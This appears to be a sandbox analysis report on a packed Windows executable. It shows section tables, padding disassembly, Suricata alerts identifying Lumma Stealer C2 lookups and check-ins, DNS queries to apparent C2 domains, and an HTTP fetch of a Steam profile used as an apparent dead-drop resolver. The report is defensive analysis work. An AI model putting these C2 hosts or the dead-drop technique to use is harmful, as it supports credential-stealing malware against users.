                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [esi], al
                                                                                                                        or al, byte ptr [eax]
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [ecx], al
                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        adc byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add eax, 0000000Ah
                                                                                                                        add byte ptr [eax], al
                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        0x10000x5d0000x25e00d7121309339618082aefcd523e399e63False0.9994972153465347data7.976216456101455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        0x600000x2a10000x200ccc64c1446b046ad8614e2043a9f3f6eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        fugcksxa0x3010000x1990000x198e00a742f0d6bb3fdf82888ef40076938dc6False0.994714441302354OpenPGP Secret Key7.953474863404757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        qefqscyw0x49a0000x10000x6009f7b746302d0ac93c9ec2e8cdce10a30False0.5807291666666666data5.0321888772075125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .taggant0x49b0000x30000x220022949893498d62ef5faa9ec47a1cc571False0.06146599264705882DOS executable (COM)0.7457603015083252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        DLLImport
                                                                                                                        kernel32.dlllstrcpy
                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2024-10-13T21:04:10.479175+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.7509071.1.1.153UDP
                                                                                                                        2024-10-13T21:04:10.492379+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.7523791.1.1.153UDP
                                                                                                                        2024-10-13T21:04:10.504974+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.7618561.1.1.153UDP
                                                                                                                        2024-10-13T21:04:10.519277+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.7525331.1.1.153UDP
                                                                                                                        2024-10-13T21:04:10.533094+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.7599151.1.1.153UDP
                                                                                                                        2024-10-13T21:04:10.544433+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.7533301.1.1.153UDP
                                                                                                                        2024-10-13T21:04:10.555186+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.7651601.1.1.153UDP
                                                                                                                        2024-10-13T21:04:10.567382+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.7554001.1.1.153UDP
                                                                                                                        2024-10-13T21:04:12.358303+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.749699104.102.49.254443TCP
                                                                                                                        2024-10-13T21:04:13.139509+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749700104.21.53.8443TCP
                                                                                                                        2024-10-13T21:04:13.139509+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700104.21.53.8443TCP
                                                                                                                        2024-10-13T21:04:14.199999+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749701104.21.53.8443TCP
                                                                                                                        2024-10-13T21:04:14.199999+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701104.21.53.8443TCP
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 13, 2024 21:04:10.596719027 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:10.596765041 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:10.596937895 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:10.599844933 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:10.599864960 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:11.315876007 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:11.315970898 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:11.335504055 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:11.335531950 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:11.336570024 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:11.404989004 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:11.917521954 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:11.959445000 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.358342886 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.358382940 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.358397961 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.358416080 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.358422995 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.358428955 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.358458042 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.358489990 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.358532906 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.486368895 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.486433029 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.486459970 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.486486912 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.486522913 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.486547947 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.493017912 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.493086100 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.493114948 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.493163109 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.493172884 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.493279934 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.493330002 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.496179104 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.496196985 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.496218920 CEST49699443192.168.2.7104.102.49.254
                                                                                                                        Oct 13, 2024 21:04:12.496226072 CEST44349699104.102.49.254192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.519769907 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:12.519814014 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.519889116 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:12.520369053 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:12.520385027 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.004801035 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.004875898 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.008440018 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.008454084 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.008857965 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.009983063 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.009999037 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.010077953 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.139554024 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.139776945 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.139826059 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.139842033 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.140369892 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.140446901 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.140453100 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.140614033 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.140681982 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.140866995 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.140866995 CEST49700443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.140887976 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.140898943 CEST44349700104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.209059954 CEST49701443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.209101915 CEST44349701104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.209192038 CEST49701443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.209610939 CEST49701443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.209630013 CEST44349701104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.681658983 CEST44349701104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.681766987 CEST49701443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.682825089 CEST49701443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.682835102 CEST44349701104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.683163881 CEST44349701104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:13.689363956 CEST49701443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.689383030 CEST49701443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:13.689452887 CEST44349701104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:14.200061083 CEST44349701104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:14.200176001 CEST44349701104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:14.200248003 CEST49701443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:14.200412989 CEST49701443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:14.200433969 CEST44349701104.21.53.8192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:14.200449944 CEST49701443192.168.2.7104.21.53.8
                                                                                                                        Oct 13, 2024 21:04:14.200457096 CEST44349701104.21.53.8192.168.2.7
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 13, 2024 21:04:10.479175091 CEST5090753192.168.2.71.1.1.1
                                                                                                                        Oct 13, 2024 21:04:10.488853931 CEST53509071.1.1.1192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:10.492378950 CEST5237953192.168.2.71.1.1.1
                                                                                                                        Oct 13, 2024 21:04:10.503295898 CEST53523791.1.1.1192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:10.504973888 CEST6185653192.168.2.71.1.1.1
                                                                                                                        Oct 13, 2024 21:04:10.514197111 CEST53618561.1.1.1192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:10.519277096 CEST5253353192.168.2.71.1.1.1
                                                                                                                        Oct 13, 2024 21:04:10.528934002 CEST53525331.1.1.1192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:10.533093929 CEST5991553192.168.2.71.1.1.1
                                                                                                                        Oct 13, 2024 21:04:10.543391943 CEST53599151.1.1.1192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:10.544433117 CEST5333053192.168.2.71.1.1.1
                                                                                                                        Oct 13, 2024 21:04:10.554105997 CEST53533301.1.1.1192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:10.555186033 CEST6516053192.168.2.71.1.1.1
                                                                                                                        Oct 13, 2024 21:04:10.566319942 CEST53651601.1.1.1192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:10.567382097 CEST5540053192.168.2.71.1.1.1
                                                                                                                        Oct 13, 2024 21:04:10.577274084 CEST53554001.1.1.1192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:10.579777956 CEST6055853192.168.2.71.1.1.1
                                                                                                                        Oct 13, 2024 21:04:10.586492062 CEST53605581.1.1.1192.168.2.7
                                                                                                                        Oct 13, 2024 21:04:12.505927086 CEST5650953192.168.2.71.1.1.1
                                                                                                                        Oct 13, 2024 21:04:12.518958092 CEST53565091.1.1.1192.168.2.7
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Oct 13, 2024 21:04:10.479175091 CEST192.168.2.71.1.1.10xb43Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.492378950 CEST192.168.2.71.1.1.10x7409Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.504973888 CEST192.168.2.71.1.1.10xe443Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.519277096 CEST192.168.2.71.1.1.10x6617Standard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.533093929 CEST192.168.2.71.1.1.10x8b98Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.544433117 CEST192.168.2.71.1.1.10xa84eStandard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.555186033 CEST192.168.2.71.1.1.10x212fStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.567382097 CEST192.168.2.71.1.1.10xb8d4Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.579777956 CEST192.168.2.71.1.1.10x296eStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:12.505927086 CEST192.168.2.71.1.1.10xb848Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Oct 13, 2024 21:04:10.488853931 CEST1.1.1.1192.168.2.70xb43Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.503295898 CEST1.1.1.1192.168.2.70x7409Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.514197111 CEST1.1.1.1192.168.2.70xe443Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.528934002 CEST1.1.1.1192.168.2.70x6617Name error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.543391943 CEST1.1.1.1192.168.2.70x8b98Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.554105997 CEST1.1.1.1192.168.2.70xa84eName error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.566319942 CEST1.1.1.1192.168.2.70x212fName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.577274084 CEST1.1.1.1192.168.2.70xb8d4Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:10.586492062 CEST1.1.1.1192.168.2.70x296eNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:12.518958092 CEST1.1.1.1192.168.2.70xb848No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                                                        Oct 13, 2024 21:04:12.518958092 CEST1.1.1.1192.168.2.70xb848No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                                        • steamcommunity.com
                                                                                                                        • sergei-esenin.com
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.749699104.102.49.2544434836C:\Users\user\Desktop\file.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-13 19:04:11 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Host: steamcommunity.com
                                                                                                                        2024-10-13 19:04:12 UTC1870INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Date: Sun, 13 Oct 2024 19:04:12 GMT
                                                                                                                        Content-Length: 34837
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: sessionid=b21ffaa07f55a676f7f32151; Path=/; Secure; SameSite=None
                                                                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                        2024-10-13 19:04:12 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                        2024-10-13 19:04:12 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                        Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                        2024-10-13 19:04:12 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                        Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
